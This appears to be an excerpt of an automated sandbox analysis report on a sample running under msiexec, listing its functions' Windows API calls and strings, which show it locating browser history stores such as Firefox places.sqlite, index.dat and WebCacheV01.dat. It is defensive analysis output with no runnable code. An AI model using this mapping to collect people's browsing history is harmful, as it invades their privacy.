                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2941347001-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscat$wcscpywcslen
                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                      • API String ID: 2489821370-1174173950
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 669240632-0
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                      • String ID: "%s"
                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Strings
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                      APIs
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$memcmp
                                                                                                      • String ID: $$8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E3EC
                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcVersionmemsetwcscpy
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                      • String ID:
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID: *.*$index.dat
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      Similarity
                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                      • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep
                                                                                                      • String ID: }A
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: BINARY
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /stext
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1065087418-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                      Similarity
                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1381354015-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1297977491-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                      Similarity
                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2154303073-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4232544981-0
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 3859505661-0
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      APIs
                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
